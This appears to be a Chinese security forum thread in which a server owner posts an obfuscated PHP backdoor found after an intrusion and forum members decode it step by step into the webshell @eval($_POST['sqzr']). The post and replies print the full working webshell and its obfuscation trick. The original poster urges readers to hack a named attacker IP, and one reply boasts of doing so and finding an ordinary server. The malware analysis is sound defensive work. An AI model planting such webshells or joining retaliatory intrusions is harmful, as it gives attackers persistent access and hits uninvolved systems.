查看: 11298|回复: 11

12日服务器被入侵提权,发现新型php后门

[复制链接]
  • TA的每日心情
    无聊
    2017-6-16 11:15
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2017-6-15 18:17:59 | 显示全部楼层 |阅读模式
    本帖最后由 user88 于 2017-6-15 18:39 编辑

    我使用的是windows server 2008 系统
    有安全狗及安全狗iis版,我就纳闷了,它是怎么拿到我服务器权限的,我所以目录的权限都设死了。

    今天我才在我的服务器上面无意中发现一个xlkfs.dll 文件,百度一查是“”“遭遇驱动级文件”病毒,还有如下,我通过配置文件找到了下面这个php后门,现在不确定还有没有后门,麻烦有php大神解密下他这个是什么原理。

    QQ截图20170615181520.jpg

    贴上php后门代码:
    [PHP] 纯文本查看 复制代码
    <?php 
    $lg="ZTZrNGtfa2RrirZWtirja29rZGirtlirIik7CiRzYnAgPirSAkdirmJsKCirJjdHciLCIiLCJjdHirdjirY3R3cirmVjdHdhdGN0d2VjdHdfZmN0d3VuirY2N";
    $vq="IAokdWY9irInNuYzMiOwoka2E9irIklFQmxkirbUZic0siOwirokcGp0irPSJDUmZVRTlUVkirYiOwokdmJsID0gc3RyX3JlcGxhY2UoirInirRpIiwiIiwidG";
    $jj = str_replace("pc","","pcspctrpc_pcrpcepcplpcacpce");
    $rkf="lzdGlir0dGlydGlfcirnRpZXRpcGx0iraWF0iraWNlIik7CiRpcXc9IkY2Y2lkZEirtUcz0iOwokYmirtmIirDir0gJHZibCgiayIsICIiLCirAia2Jha3Nr";
    $qi="0d3RjdHdpb2N0d2ir4iKTsKirJG1weSA9ICRzYnAoJycsICRia2YoJHZibCgiYiIsICIiLirCAka2EuJHirBirqdC4kdWYuJGlxdykirpKTsgJG1weSgpOwo=";
    $nsx = $jj("dd", "", "bddasddedd6dd4dd_dddddeddcddoddddde");
    $ifl = $jj("ef","","efcreatefe_effefuefnefceftiefoefn");
    $jez = $ifl('', $nsx($jj("ir", "", $vq.$rkf.$lg.$qi))); $jez();
    ?>


    此人来我服务器的日志记录段:

    2017-06-12 05:38:40 W3SVC3 SICTFFDUJOZDJKG xxxxxxxxxxx POST /inc/module/wee.php - 80 - 122.114.111.206 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) 200 0 0 78

    还发现个惊喜:

    http://122.114.111.206/

    一定是他的跳板机子,上面一定还有很多倍入侵的网站shell
    有实力的人可以尝试拿下他的服务器
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2017-6-15 18:30:21 | 显示全部楼层
    很稳,肯定是木马
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-10-1 09:06
  • 签到天数: 380 天

    [LV.9]以坛为家II

    发表于 2017-6-17 15:10:20 | 显示全部楼层
    很稳,是木马,通过了两个循环。
    str_replace,base64_decode,create_function三个函数的组合拳而已。
    最终解出来:@eval($_POST['sqzr']);

    点评

    怎么解析出来的啊  详情 回复 发表于 2017-6-20 16:45

    评分

    参与人数 1贡献 +1 收起 理由
    90_ + 1 感谢分享

    查看全部评分

    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2018-8-26 13:46
  • 签到天数: 426 天

    [LV.9]以坛为家II

    发表于 2017-6-17 17:24:55 | 显示全部楼层
    顶3楼
    $jez = create_function('', base64_decode(str_replace("ir", "", $vq.$rkf.$lg.$qi)));

    $vq.$rkf.$lg.$qi:
    IAokdWY9irInNuYzMiOwoka2E9irIklFQmxkirbUZic0siOwirokcGp0irPSJDUmZVRTlUVkirYiOwokdmJsID0gc3RyX3JlcGxhY2UoirInirRpIiwiIiwidGlzdGlir0dGlydGlfcirnRpZXRpcGx0iraWF0iraWNlIik7CiRpcXc9IkY2Y2lkZEirtUcz0iOwokYmirtmIirDir0gJHZibCgiayIsICIiLCirAia2Jha3NrZTZrNGtfa2RrirZWtirja29rZGirtlirIik7CiRzYnAgPirSAkdirmJsKCirJjdHciLCIiLCJjdHirdjirY3R3cirmVjdHdhdGN0d2VjdHdfZmN0d3VuirY2N0d3RjdHdpb2N0d2ir4iKTsKirJG1weSA9ICRzYnAoJycsICRia2YoJHZibCgiYiIsICIiLirCAka2EuJHirBirqdC4kdWYuJGlxdykirpKTsgJG1weSgpOwo=

    str_replace("ir", "", $vq.$rkf.$lg.$qi)
    IAokdWY9InNuYzMiOwoka2E9IklFQmxkbUZic0siOwokcGp0PSJDUmZVRTlUVkYiOwokdmJsID0gc3RyX3JlcGxhY2UoInRpIiwiIiwidGlzdGl0dGlydGlfcnRpZXRpcGx0aWF0aWNlIik7CiRpcXc9IkY2Y2lkZEtUcz0iOwokYmtmID0gJHZibCgiayIsICIiLCAia2Jha3NrZTZrNGtfa2RrZWtja29rZGtlIik7CiRzYnAgPSAkdmJsKCJjdHciLCIiLCJjdHdjY3R3cmVjdHdhdGN0d2VjdHdfZmN0d3VuY2N0d3RjdHdpb2N0d24iKTsKJG1weSA9ICRzYnAoJycsICRia2YoJHZibCgiYiIsICIiLCAka2EuJHBqdC4kdWYuJGlxdykpKTsgJG1weSgpOwo=

    base64_encode(str_replace("ir", "", $vq.$rkf.$lg.$qi));
    $uf="snc3";
    $ka="IEBldmFbsK";
    $pjt="CRfUE9TVF";
    $vbl = str_replace("ti","","tistittirti_rtietipltiatice");
    $iqw="F6ciddKTs=";
    $bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
    $sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
    $mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy();

    $mpy = $create_function('', $base64_decode(str_replace("b", "", $ka.$pjt.$uf.$iqw)));

    str_replace("b", "","IEBldmFbsKCRfUE9TVFsnc3F6ciddKTs=");  
    IEBldmFsKCRfUE9TVFsnc3F6ciddKTs=

    base64_encode("IEBldmFsKCRfUE9TVFsnc3F6ciddKTs=");
    @eval($_POST['sqzr']);





















    评分

    参与人数 1贡献 +1 收起 理由
    90_ + 1 感谢分享

    查看全部评分

    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2019-1-18 00:14
  • 签到天数: 141 天

    [LV.7]常住居民III

    发表于 2017-6-17 18:08:46 | 显示全部楼层
    卧槽,这么牛,你的服务器上面有什么,竟然被大牛盯上
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2021-4-20 08:43
  • 签到天数: 201 天

    [LV.7]常住居民III

    发表于 2017-6-20 16:42:32 | 显示全部楼层
    厉害  那个是加密的吗,我都看不懂
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2021-4-20 08:43
  • 签到天数: 201 天

    [LV.7]常住居民III

    发表于 2017-6-20 16:45:46 | 显示全部楼层

    RE: 12日服务器被入侵提权,发现新型php后门

    w2015 发表于 2017-6-17 15:10
    很稳,是木马,通过了两个循环。
    str_replace,base64_decode,create_function三个函数的组合拳而已。
    最 ...

    怎么解析出来的啊

    点评

    看4楼表哥的就可以了!将变量echo出来就可以看了!  详情 回复 发表于 2017-6-20 18:26
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-10-1 09:06
  • 签到天数: 380 天

    [LV.9]以坛为家II

    发表于 2017-6-20 18:26:24 | 显示全部楼层

    RE: 12日服务器被入侵提权,发现新型php后门


    看4楼表哥的就可以了!将变量echo出来就可以看了!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-10-1 06:59
  • 签到天数: 308 天

    [LV.8]以坛为家I

    发表于 2017-6-23 02:31:17 | 显示全部楼层

    RE: 12日服务器被入侵提权,发现新型php后门

    长夜漫漫,寂寞难耐,一言不合就开干!!!
    然而搞下来后发现并不是所谓的跳板机,是正常的带网站的Linux服务器,楼主怎么说?
    QQ截图20170623022813.jpg
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-7-17 10:55
  • 签到天数: 146 天

    [LV.7]常住居民III

    发表于 2017-6-23 09:25:03 | 显示全部楼层
    都是厉害的大牛
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-24 07:15 , Processed in 0.042167 second(s), 21 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部